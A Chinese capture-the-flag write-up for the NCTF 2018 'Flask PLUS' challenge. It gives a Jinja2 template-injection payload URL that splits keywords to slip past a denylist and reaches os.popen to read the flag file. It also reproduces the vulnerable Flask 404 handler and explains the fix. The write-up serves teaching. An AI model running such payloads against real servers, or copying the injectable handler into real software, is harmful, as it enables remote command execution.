Problem: [NCTF 2018]Flask PLUS
思路
- 解题大致思路
- 直接用 fenjing 工具一把梭了
EXP
- 具体攻击代码
http://node4.anna.nssctf.cn:24494/index{{(cycler.next.__globals__['o''s']['po''pen']('cat /Th1s_is__F1114g')).read()}}
总结
- 对该题的考点总结
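扒了一下源码：404 处理函数把解码后的 URL 直接拼进模板字符串，再交给 render_template_string 渲染，只靠子串黑名单过滤，所以存在 SSTI；修复思路是保持模板内容固定，把 URL 作为变量传给渲染函数。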
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask,render_template,render_template_string,redirect,request,session,abort,send_from_directory
import os
from urllib import parse
# Flask application object; the route and the 404 handler below register on it.
app = Flask(__name__)
@app.route("/")
def index():
    """Serve the home page by rendering the ``index2.html`` template."""
    page = render_template("index2.html")
    return page
@app.errorhandler(404)
def page_not_found(e):
    """Build the 404 response, echoing the requested URL back to the client.

    The URL-decoded request URL is formatted into the template *source* with
    ``%s`` and that source is then handed to ``render_template_string``, so
    the URL text becomes part of the template itself. The only barrier in
    front of the renderer is the substring denylist in ``safe_jinja``; a URL
    that trips it is answered with the static ``404.html`` page instead.

    NOTE(review): a substring denylist is not a reliable control against
    template injection. The robust pattern is to keep the template source
    constant and pass the URL to the renderer as a context variable, so it is
    treated as data rather than template code.

    Args:
        e: The error object supplied to the handler; not used in the body.

    Returns:
        A ``(body, 404)`` tuple.
    """

    def safe_jinja(s):
        """Return True when *s* contains none of the denylisted substrings."""
        blacklist = [
            'import', 'getattr', 'os', 'class', 'subclasses', 'mro',
            'request', 'args', 'eval', 'if', 'for', 'subprocess', 'file',
            'open', 'popen', 'builtins', 'compile', 'execfile',
            'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
            'getattribute', 'func_globals', '__init__', 'join', '__dict__',
        ]
        # Case-insensitive substring match; one hit is enough to reject.
        lowered = s.lower()
        return not any(term.lower() in lowered for term in blacklist)

    decoded_url = parse.unquote(request.url)

    # The decoded URL is spliced into the template text here, before any
    # rendering happens; ``%%`` keeps the literal Jinja block tags intact.
    template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (decoded_url)

    if not safe_jinja(decoded_url):
        # Denylist hit: fall back to the static error page.
        return render_template("404.html"), 404
    return render_template_string(template), 404
if __name__ == "__main__":
    # Start Flask's built-in server, listening on all interfaces, port 5000.
    app.run(port=5000, host='0.0.0.0')
